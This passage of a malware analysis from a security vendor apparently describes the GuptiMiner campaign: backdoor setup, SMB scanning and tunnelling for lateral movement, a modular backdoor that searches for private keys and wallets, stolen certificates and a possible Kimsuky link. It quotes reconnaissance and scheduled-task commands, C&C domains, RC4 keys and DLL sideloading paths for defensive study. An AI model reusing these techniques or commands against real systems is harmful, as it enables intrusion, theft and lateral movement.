<p>The backdoor is set up by the previous stage, Puppeteer, by first discovering whether the machine is operating on a Windows Server or not. This is done by checking a DNS Server registry key (DNS Server service is typically running on a Windows Server edition):<br><code>SOFTWARE\Microsoft\Windows NT\CurrentVersion\DNS Server </code></p>
<p>After that, the malware runs a command to check and get a number of computers joined in a domain:<br><code>net group “domain computers” /domain</code></p>
<p>The data printed by the <code>net group</code> command typically uses 25 characters per domain joined computer plus a newline (<code>CR+LF</code>) per every three computers, which can be illustrated by the example below: </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png"><img loading="lazy" decoding="async" width="502" height="80" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png" alt="" class="wp-image-8460" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png 502w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39-300x48.png 300w" sizes="(max-width: 502px) 100vw, 502px" /></a><figcaption class="wp-element-caption"><em>Example output of net group command</em></figcaption></figure></div>
<p>In this version of the backdoor setup, Puppeteer checks whether the number of returned bytes is more than 100. If so, Puppeteer assumes it runs in a network shared with at least five computers and downloads additional payloads from a hardcoded C&C (<code>https://m.airequipment[.]net/gpse/</code>) and executes it using PowerShell command. </p>
<p>Note that the threshold for the number of returned bytes was different and significantly higher in later versions of GuptiMiner, as can be seen in a dedicated section discussing <a href="#modular-backdoor">Modular Backdoor</a>, resulting in compromising only those networks which had more than 7000 computers joined in the same domain! </p>
<p>If the checks above pass, Puppeteer uses a PowerShell command for downloading and executing the payload and, interestingly, it is run both in the current process as well as injected in <code>explorer.exe</code>. </p>
<figure class="wp-block-image size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-40.png"><img loading="lazy" decoding="async" width="850" height="72" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-40.png" alt="" class="wp-image-8461" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-40.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-40-300x25.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-40-768x65.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a></figure>
<p>Furthermore, regardless of whether the infected computer is present in a network of a certain size or not, it tries to download additional payload from <code>dl.sneakerhost[.]com/u</code> as well. This payload is yet another PNG file with the appended shellcode. We know this because the code uses the exact same parsing from the specific offset <code>0x325</code> of the PNG file as described in <a href="#png-loader">Stage 1</a>. However, during our analysis, this domain was already taken down and we couldn’t verify what kind of payload was being distributed here. </p>
<p>The Puppeteer’s backdoor setup process was improved and tweaked multiple times during its long development. In the upcoming subsections, we will focus on more important changes, mostly those which influence other parts of the malware or present a whole new functionality. </p>
<h3 class="wp-block-heading">Later Puppeteer Versions </h3>
<p>In later versions, the attackers switched to the datetime mutex paradigm (as illustrated in <a href="#mutexes-in-time">Mutexes in Time</a> section) and also introduced additional process monitoring of more Sysinternals tools like Process explorer, Process monitor, as well as other tools like OllyDbg, WinDbg, and TeamViewer. </p>
<h4 class="wp-block-heading">Pool Configuration</h4>
<p><code><em>487624b44b43dacb45fd93d03e25c9f6d919eaa6f01e365bb71897a385919ddd</em><br><em>(2023-11-21 18:05:43 UTC)</em> </code></p>
<p>Additionally, the GuptiMiner authors also started to modify pool addresses in XMRig configurations with a new approach. They started using subdomains by “<code>r</code>” and “<code>m</code>” depending on the available physical memory on the infected system. If there is at least 3 GB of RAM available, the malware uses:<br><code>m.domain.tld</code> with <code>auto</code> mode and enabled huge pages.</p>
<p>If the available RAM is lesser than 3 GB, it uses:<br><code>r.domain.tld</code> with <code>light</code> mode and disabled huge pages.</p>
<p>In order to <strong>not</strong> keep things simple, the authors later also started to use “<code>p</code>” as a subdomain in some versions, without any specific reason for the naming convention (perhaps just to say it is a “pool”). </p>
<p>The usage of all such domains in time can be seen in the <a href="#domains-in-time">Domains timeline</a>. </p>
<h4 class="wp-block-heading">Variety in Used DLLs </h4>
<p>Puppeteer used many different names and locations of DLLs over the years for sideloading or directly loading using scheduled tasks. For example, these might be: </p>
<ul>
<li><code>C:\Program Files (x86)\eScan\updll3.dll3 </code></li>
<li><code>C:\Program Files\Common Files\SYSTEM\SysResetErr\SysResetErr.DLL </code></li>
<li><code>C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellChecking.DLL </code></li>
<li><code>C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellCheckingHost.DLL </code></li>
<li><code>C:\ProgramData\AMD\CNext\atiadlxx.dll </code></li>
<li><code>C:\ProgramData\Microsoft\Assistance\LunarG\vulkan-1.dll </code></li>
<li><code>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll </code></li>
<li><code>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3 </code></li>
<li><code>C:\ProgramData\Microsoft\Network\Escan\AutoWake.dll </code></li>
</ul>
<h4 class="wp-block-heading">Puppeteer Cleanup </h4>
<p><code><em>1c31d06cbdf961867ec788288b74bee0db7f07a75ae06d45d30355c0bc7b09fe</em><br><em>(2020-03-09 00:57:11 UTC)</em></code></p>
<p>We’ve also seen “cleaner” Puppeteers, meaning they didn’t contain the setup process for backdoors, but they were able to delete the malicious DLLs from the system when a running monitoring tool was detected. </p>
<h4 class="wp-block-heading" id="deploy-per-quarter">Deploy Per-Quarter </h4>
<p><code><em>1fbc562b08637a111464ba182cd22b1286a185f7cfba143505b99b07313c97a4</em><br><em>(2021-03-01 10:43:27 UTC)</em> </code></p>
<p>In this particular version, the deployment of the backdoor was performed once every 3 months, indicating a per-quarter deployment.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-41.png"><img loading="lazy" decoding="async" width="603" height="93" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-41.png" alt="" class="wp-image-8462" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-41.png 603w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-41-300x46.png 300w" sizes="(max-width: 603px) 100vw, 603px" /></a><figcaption class="wp-element-caption"><em>The deployment happens at March, June, September, and December</em></figcaption></figure></div>
<h2 class="wp-block-heading">Stage 4 – Backdoor </h2>
<p>Since <strong>no one</strong> who puts such an effort into a malware campaign deploys <em>just</em> coinminers on the infected devices, let’s dig deeper into additional sets of GuptiMiner’s functionalities – deploying two types of backdoors on the infected devices.</p>
<h3 class="wp-block-heading">PuTTY Backdoor </h3>
<p><code><em>07beca60c0a50520b8dbc0b8cc2d56614dd48fef0466f846a0a03afbfc42349d</em><br><em>(2021-03-01 10:31:33 UTC)</em></code><br><em><code>E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb</code></em></p>
<p>One of the backdoors deployed by GuptiMiner is based on a custom build of PuTTY Link (<code>plink</code>). This build contains an enhancement for local SMB network scanning, and it ultimately enables lateral movement over the network to potentially exploit <code>Windows 7</code> and <code>Windows Server 2008</code> machines by tunneling SMB traffic through the victim’s infected device. </p>
<h4 class="wp-block-heading">Local SMB Scanning </h4>
<p>First, the plink binary is injected into netsh.exe process by Puppeteer with the <a href="#deploy-per-quarter">Deploy per-quarter</a> approach. After a successful injection, the malware discovers local IP ranges by reading the IP tables from the victim’s device, adding those into local and global IP range lists. </p>
<p>With that, the malware continues with the local SMB scanning over the obtained IP ranges: <code>xx.yy.zz.1-254</code>. When a device supporting SMB is discovered, it is saved in a dedicated list. The same goes with IPs that don’t support SMB, effectively deny listing them from future actions. This deny list is saved in specific registry subkeys named <code>Sem</code> and <code>Init</code>, in this location:<br><code>HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\Control\CMF\Class</code><br>where <code>Init</code> contains the found IP addresses and <code>Sem</code> contains their total count. </p>
<p>There are conditions taking place when such a scan is performed. For example, the scan can happen only when it is a day in the week <code>(!)</code>, per-quarter deployment, and only at times between 12 PM and 18 PM. Here, we denoted by <code>(!)</code> a <em>unique</em> coding artefact in the condition, since checking the day of the week is not necessary (always true). </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42.png"><img loading="lazy" decoding="async" width="1477" height="217" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42.png" alt="" class="wp-image-8463" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42.png 1477w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42-300x44.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42-1024x150.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-42-768x113.png 768w" sizes="(max-width: 1477px) 100vw, 1477px" /></a><figcaption class="wp-element-caption"><em>Questionable conditioning for SMB scanning</em></figcaption></figure></div>
<p>Finally, the malware also creates a new registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\RNG\FFFF</code> three hours after a successful scan. This serves as a flag that the scanning should be finished, and no more scanning is needed. </p>
<p>An even more interesting datetime-related bug can be seen in a conditioning of <code>RNG\FFFF</code> registry removal. The removal is done to indicate that the malware can perform another SMB scan after a certain period of time. </p>
<p>As we can see in the figure below, the malware obtains the write time of the registry key and the current system time by <code>SystemTimeToVariantTime</code> API function and subtracts those. The subtraction result is a floating-point number where the integral part means number of days. </p>
<p>Furthermore, the malware uses a constant <code>60*60*60*24=5184000</code> seconds (60 days) in the condition for the registry key removal. However, the condition is comparing <code>VariantTime</code> (days) with seconds. Thus, the backdoor can activate every <code>51.84</code> days instead of the (intended?) 60 days. A true blessing in disguise. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-43.png"><img loading="lazy" decoding="async" width="779" height="416" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-43.png" alt="" class="wp-image-8464" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-43.png 779w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-43-300x160.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-43-768x410.png 768w" sizes="(max-width: 779px) 100vw, 779px" /></a><figcaption class="wp-element-caption"><em>Removal of <code>RNG\FFFF</code> key, deploying the backdoor after <code>51.84</code> days</em></figcaption></figure></div>
<h4 class="wp-block-heading">Lateral Movement Over SMB Traffic </h4>
<p>After the local SMB scan is finished, the malware checks from the received SMB packet results whether any of the IP addresses that responded are running <code>Windows 7</code> or <code>Windows Server 2008</code>. If any such a system is found on the local network, the malware adds these IP addresses to a list of potential targets. </p>
<p>Furthermore, GuptiMiner executes the <code>main()</code> legacy function from plink with artificial parameters. This will create a tunnel on the port <code>445</code> between the attacker’s server <code>gesucht[.]net</code> and the victim’s device. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-45.png"><img loading="lazy" decoding="async" width="612" height="545" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-45.png" alt="" class="wp-image-8466" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-45.png 612w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-45-300x267.png 300w" sizes="(max-width: 612px) 100vw, 612px" /></a><figcaption class="wp-element-caption"><em>Parameters used for <code>plink main()</code> function</em></figcaption></figure></div>
<p>This tunnel is used for sending SMB traffic through the victim’s device to the IP addresses from the target list, enabling lateral movement over the local network. </p>
<p>Note that this version of Puppeteer, deploying this backdoor, is from 2021. We also mentioned that only <code>Windows 7</code> and <code>Windows Server 2008</code> are targeted, which are rather old. We think this might be because the attackers try to deploy an exploit for possible vulnerabilities on these old systems. </p>
<p>To orchestrate the SMB communication, the backdoor hand-crafts SMB packets on the fly by modifying <code>TID</code> and <code>UID</code> fields to reflect previous SMB communication. As shown in the decompiled code below, the SMB <code>packet 4</code>, which is crafted and sent by the malware, contains both <code>TID</code> and <code>UID</code> from the responses of the local network device. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46.png"><img loading="lazy" decoding="async" width="1065" height="572" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46.png" alt="" class="wp-image-8467" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46.png 1065w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46-300x161.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46-1024x550.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-46-768x412.png 768w" sizes="(max-width: 1065px) 100vw, 1065px" /></a><figcaption class="wp-element-caption"><em>The backdoor hand-crafts SMB packets on the fly</em></figcaption></figure></div>
<p>Here we provide an example how the SMB packets look like in Wireshark when sent by the malware. After the connection is established, the malware tries to login as anonymous and makes requests for <code>\IPC$</code> and a named pipe.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-47.png"><img loading="lazy" decoding="async" width="1007" height="88" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-47.png" alt="" class="wp-image-8468" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-47.png 1007w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-47-300x26.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-47-768x67.png 768w" sizes="(max-width: 1007px) 100vw, 1007px" /></a><figcaption class="wp-element-caption"><em>SMB traffic captured by Wireshark</em></figcaption></figure></div>
<p>Interested reader can find the captured PCAP on our <a href="https://github.com/avast/ioc/blob/master/GuptiMiner/extras/PCAP/smb_backdoor_networking.pcap" target="_blank" rel="noreferrer noopener">GitHub</a>.</p>
<h3 class="wp-block-heading" id="modular-backdoor">Modular Backdoor </h3>
<p><code><em>f0ccfcb5d49d08e9e66b67bb3fedc476fdf5476a432306e78ddaaba4f8e3bbc4</em><br><em>(2023-10-10 15:08:36 UTC)</em> </code></p>
<p>Another backdoor that we’ve found during our research being distributed by Puppeteer is a modular backdoor which targets huge corporate networks. It consists of two phases – the malware scans the devices for the existence of locally stored private keys and cryptocurrency wallets, and the second part is an injected modular backdoor, in the form of a shellcode. </p>
<h4 class="wp-block-heading">Checks on Private Keys, Wallets, and Corporate Network</h4>
<p>This part of the backdoor focuses on scanning for private keys and wallet files on the system. This is done by searching for <code>.pvk</code> and <code>.wallet</code> files in these locations: </p>
<ul>
<li><code>C:\Users\* </code></li>
<li><code>D:\* </code></li>
<li><code>E:\* </code></li>
<li><code>F:\* </code></li>
<li><code>G:\* </code></li>
</ul>
<p>If there is such a file found in the system, its path is logged in a newly created file <code>C:\Users\Public\Ca.txt</code>. Interestingly, this file is not processed on its own by the code we have available. We suppose the data will be stolen later when further modules are downloaded by the backdoor. </p>
<p>The fact that the scan was performed is marked by creating a registry key:<br><code>HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\DECLAG </code></p>
<p>If some private keys or wallets were found on the system or the malware is running in a huge corporate environment, the malware proceeds with injecting the backdoor, in a form of a shellcode, into the <code>mmc.exe</code> process. </p>
<p>The size of the corporate environment is guessed by the same approach as Puppeteer’s <a href="#backdoor-setup">backdoor setup</a> with the difference in the scale. Here, the malware compares the returned list of computers in the domain with 200,000 characters. To recapitulate, the data printed by the <code>net group</code> command uses 25 characters per domain joined computer plus a newline (<code>CR+LF</code>) per every three computers. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png"><img loading="lazy" decoding="async" width="502" height="80" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png" alt="" class="wp-image-8460" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39.png 502w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-39-300x48.png 300w" sizes="(max-width: 502px) 100vw, 502px" /></a><figcaption class="wp-element-caption"><em>Example output of <code>net group</code> command</em></figcaption></figure></div>
<p>This effectively means that the network in which the malware operates must have at least 7781 computers joined in the domain, which is quite a large number.</p>
<h4 class="wp-block-heading">Backdoor</h4>
<p><code><em>8446d4fc1310b31238f9a610cd25ea832925a25e758b9a41eea66f998163bb34</em> </code></p>
<p>This shellcode is a completely different piece of code than what we’ve seen so far across GuptiMiner campaign. It is designed to be multi-modular with the capability of adding more modules into the execution flow. Only a networking communication module, however, is hardcoded and available by default, and its hash is <code>74d7f1af69fb706e87ff0116b8e4fa3a9b87275505e2ee7a32a8628a2d066549 (<em>2022-12-19 07:31:39 UTC</em>)</code>. </p>
<p>After the injection, the backdoor decrypts a hardcoded configuration and a hardcoded networking module using RC4. The RC4 key is also hardcoded and available directly in the shellcode. </p>
<p>The configuration contains details about which server to contact, what ports to use, the length of delays that should be set between commands/requests, among others. The domain for communication in this configuration is <code>www.righttrak[.]net:443</code> and an IP address <code>185.248.160[.]141</code>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-50.png"><img loading="lazy" decoding="async" width="642" height="235" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-50.png" alt="" class="wp-image-8471" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-50.png 642w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-50-300x110.png 300w" sizes="(max-width: 642px) 100vw, 642px" /></a><figcaption class="wp-element-caption"><em>Decrypted network module configuration</em></figcaption></figure></div>
<p>The network module contains seven different commands that the attacker can use for instructing the backdoor about what to do. A complete list of commands accepted by the network module can be found in the table below. Note that each module that can be used by the backdoor contains such a command handler on its own. </p>
<figure class="wp-block-table"><table><tbody><tr><td><strong>Command</strong> </td><td><strong>Description</strong> </td></tr><tr><td>3.0 </td><td>Connect </td></tr><tr><td>3.1 </td><td>Read socket </td></tr><tr><td>3.2 </td><td>Write socket </td></tr><tr><td>3.3 </td><td>Close socket </td></tr><tr><td>4 </td><td>Close everything </td></tr><tr><td>6 </td><td>Return 1 </td></tr><tr><td>12 </td><td>Load configuration </td></tr></tbody></table></figure>
<p>The modules are stored in an encrypted form in the registry, ensuring their persistence:<br><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCB</code></p>
<p>The backdoor also uses an import by hash obfuscation for resolving API functions. The hashing function is a simple algorithm that takes each byte of the exported function name, adds 1 to it, and then multiplies the previously calculated number (<code>calculated_hash</code>, starts with 0) by 131 and adds it to the byte:</p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="850" height="72" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-52.png" alt="" class="wp-image-8473" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-52.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-52-300x25.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-52-768x65.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></figure>
<p>The server <code>www.righttrak[.]net:443</code> had, at the time, a valid certificate. Note for example the <em>not-at-all-suspicious</em> email address the authors used. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-53.png"><img loading="lazy" decoding="async" width="779" height="933" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-53.png" alt="" class="wp-image-8474" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-53.png 779w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-53-250x300.png 250w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-53-768x920.png 768w" sizes="(max-width: 779px) 100vw, 779px" /></a><figcaption class="wp-element-caption"><em>Certificate on <code>www.righttrak[.]net:443</code> as shown by Censys</em></figcaption></figure></div>
<h4 class="wp-block-heading" id="other-infection-vectors-modular-backdoor">Other Infection Vectors of Modular Backdoor</h4>
<p><em><code>af9f1331ac671d241bf62240aa52389059b4071a0635cb9cb58fa78ab942a33b</code></em></p>
<p>During our research, we have also found a 7zip SFX executable containing two files: </p>
<ul>
<li><code>ms00.dat</code> </li>
<li><code>notepad.exe</code> </li>
</ul>
<p><code>notepad.exe</code> is a small binary that decrypts <code>ms00.dat</code> file using RC4 with a key <code>V#@!1vw32</code>. The decrypted <code>ms00.dat</code> file is the same Modular Backdoor malware as described above. </p>
<p>However, we have not seen this SFX executable being distributed by GuptiMiner. This indicates that this backdoor might be distributed by different infection vectors as well. </p>
<h2 class="wp-block-heading">Related and Future Research</h2>
<p>We’ve also observed other more or less related samples during our research. </p>
<h3 class="wp-block-heading">PowerShell Scripts</h3>
<p>Interestingly, we’ve found the C&C domain from the backdoor setup phase (in Puppeteer) in additional scripts as well which were not distributed by traditional GuptiMiner operation as we know it. We think this might be a different kind of attack sharing the GuptiMiner infrastructure, though it might be a different campaign. Formatted PowerShell script can be found below: </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-54.png"><img loading="lazy" decoding="async" width="850" height="720" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-54.png" alt="" class="wp-image-8475" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-54.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-54-300x254.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-54-768x651.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a><figcaption class="wp-element-caption"><em>A PowerShell script targeting eScan (formatted)</em></figcaption></figure></div>
<p>In this case, the payload is downloaded and executed from the malicious domain only when an antivirus is installed, and its name has more than 4 letters and starts with <code>eS</code>. One does not have to be a scrabble champion to figure out that the malware authors are targeting the eScan AV once again. The malicious code is also run when the name of the installed AV has less than 5 letters. </p>
<p>We’ve found this script being run via a scheduled task with a used command:<br><code>"cmd.exe" /c type "\<domain>\SYSVOL\<domain>\scripts\gpon.inc" | "\<domain>\SYSVOL\<domain>\scripts\powAMD64.dat" -nop - </code><br>where <code>powAMD64.dat</code> is a copy of <code>powershell.exe</code>. The task name and location was <code>C:\Windows\System32\Tasks\ScheduledDefrag </code></p>
<h3 class="wp-block-heading">Usage of Stolen Certificates </h3>
<p>We have found two stolen certificates used for signing GuptiMiner payloads. Interestingly, one of the used stolen certificates originates in Winnti operations. In this particular sample, the digital signature has a hash: <br><code>529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56</code> </p>
<p>This certificate is the same as mentioned by <a href="https://securelist.com/winnti-more-than-just-a-game/37029/" target="_blank" rel="noreferrer noopener">Kaspersky</a> more than 10 years ago. However, we’ve also seen this certificate to be used in multiple malware samples than just GuptiMiner, though, indicating a broader leak. </p>
<p>A complete list of stolen certificates and their usage can be found in the table below: </p>
<figure class="wp-block-table"><table><tbody><tr><td><strong>Stolen certificate SHA1</strong> </td><td><strong>Signed GuptiMiner sample</strong> </td></tr><tr><td>529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 </td><td>31dfba1b102bbf4092b25e63aae0f27386c480c10191c96c04295cb284f20878 </td></tr><tr><td>529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 </td><td>8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049 </td></tr><tr><td>31070C2EA30E6B4E1C270DF94BE1036AE7F8616B </td><td>b0f94d84888dffacbc10bd7f9983b2d681b55d7e932c2d952d47ee606058df54 </td></tr><tr><td>31070C2EA30E6B4E1C270DF94BE1036AE7F8616B </td><td>f656a418fca7c4275f2441840faaeb70947e4f39d3826d6d2e50a3e7b8120e4e </td></tr></tbody></table></figure>
<h3 class="wp-block-heading">Possible Ties to Kimsuky </h3>
<p><code><em>7f1221c613b9de2da62da613b8b7c9afde2ea026fe6b88198a65c9485ded7b3d</em><br><em>(2021-03-06 20:13:32 UTC)</em> </code></p>
<p>During our research, we’ve also found an information stealer which holds a rather similar PDB path as was used across the whole GuptiMiner campaign (<code>MainWork</code>):<br><code>F:\!PROTECT\Real\startW-2008\MainWork\Release\MainWork.pdb</code> </p>
<p>However, we haven’t seen it distributed by GuptiMiner and, according to our data, it doesn’t belong to the same operation and infection chain. This malware performs stealing activities like capturing every keystroke, harvesting HTML forms from opened browser tabs, noting times of opened programs, etc., and stores them in log files. </p>
<p>What is truly interesting, however, is that this information stealer might come from Kimsuky operations. Also known as Black Banshee, among other aliases, Kimsuky is a North Korean state-backed APT group. </p>
<p>It contains the similar approach of searching for AhnLab real-time detection window class name <code>49B46336-BA4D-4905-9824-D282F05F6576</code> as mentioned by both <a href="https://asec.ahnlab.com/en/31089/" target="_blank" rel="noreferrer noopener">AhnLab</a> as well as <a href="https://blog.talosintelligence.com/kimsuky-abuses-blogs-delivers-malware/" target="_blank" rel="noreferrer noopener">Cisco Talos Intelligence</a> in their <em>Information-gathering module</em> section. If such a window is found, it will be terminated/hidden from the view of the infected user. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55.png"><img loading="lazy" decoding="async" width="1024" height="410" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55-1024x410.png" alt="" class="wp-image-8477" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55-1024x410.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55-300x120.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55-768x308.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-55.png 1338w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>Function that searches and terminates AhnLab’s real-time detection window class</em></figcaption></figure></div>
<p>Furthermore, the stealer contains an encrypted payload in resources, having a hash: <code>d5bc6cf988c6d3c60e71195d8a5c2f7525f633bb54059688ad8cfa1d4b72aa6c (<em>2021-02-19 19.02.2021 15:00:47 UTC</em>)</code> and it has this PDB path:<br><code>F:\PROTECT\Real\startW-2008\HTTPPro\Release\HTTPPro.pdb</code> </p>
<p>This module is decrypted using the standard RC4 algorithm with the key <code>messi.com</code>. The module is used for downloading additional stages. One of the used URLs are:<br><code>http://stwu.mygamesonline[.]org/home/sel.php</code><br><code>http://stwu.mygamesonline[.]org/home/buy.php?filename=%s&key=%s</code> </p>
<p>The domain <code>mygamesonline[.]org</code> is commonly used by Kimsuky (with variety of subdomains). </p>
<p>The keylogger also downloads next stage called <code>ms12.acm</code>: </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-56.png"><img loading="lazy" decoding="async" width="467" height="169" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-56.png" alt="" class="wp-image-8478" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-56.png 467w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-56-300x109.png 300w" sizes="(max-width: 467px) 100vw, 467px" /></a><figcaption class="wp-element-caption"><em>The next stage is downloaded with a name <code>ms12.acm</code></em></figcaption></figure></div>
<p>With this, we see a possible pattern with the naming convention and a link to Modular Backdoor. As described in the <a href="#other-infection-vectors-modular-backdoor">Other Infection Vectors</a> section, the 7z SFX archive contains an encrypted file called <code>ms00.dat</code> with which we struggle to ignore the resemblance.</p>
<p>Last but not least, another strong indicator for a possible attribution is the fact that the Kimsuky keylogger sample <code>dddc57299857e6ecb2b80cbab2ae6f1978e89c4bfe664c7607129b0fc8db8b1f</code>, which is mentioned in the same blogpost from Talos, contains a section called <code>.vlizer</code>, as seen below: </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57.png"><img loading="lazy" decoding="async" width="1024" height="269" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57-1024x269.png" alt="" class="wp-image-8479" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57-1024x269.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57-300x79.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57-768x202.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-57.png 1277w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>Kimsuky keylogger sections</em></figcaption></figure></div>
<p>During the GuptiMiner installation process (<a href="#installation-process">Stage 0</a>), we wrote about the threat actors introducing <a href="#code-virtualization">Code Virtualization</a> in 2018. This was done by using a dedicated section called <code>.v_lizer</code>. </p>
<h2 class="wp-block-heading">Conclusion </h2>
<p>In this analysis, we described our findings regarding a long-standing threat we called GuptiMiner, in detail. This sophisticated operation has been performing MitM attacks targeting an update mechanism of the eScan antivirus vendor. We disclosed the security vulnerability to both eScan and the India CERT and received confirmation on 2023-07-31 from eScan that the issue was fixed and successfully resolved. </p>
<p>During the GuptiMiner operation, the attackers were deploying a wide chain of stages and functionalities, including performing DNS requests to the attacker’s DNS servers, sideloading, extracting payloads from innocent-looking images, signing its payloads with a custom trusted root anchor certification authority, among others. </p>
<p>Two different types of backdoors were discovered, targeting large corporate networks. The first provided SMB scanning of the local network, enabling lateral movement over the network to potentially exploit vulnerable Windows 7 and Windows Server 2008 systems on the network. The second backdoor is multi-modular, accepting commands on background to install more modules as well as focusing on stealing stored private keys and cryptowallets. </p>
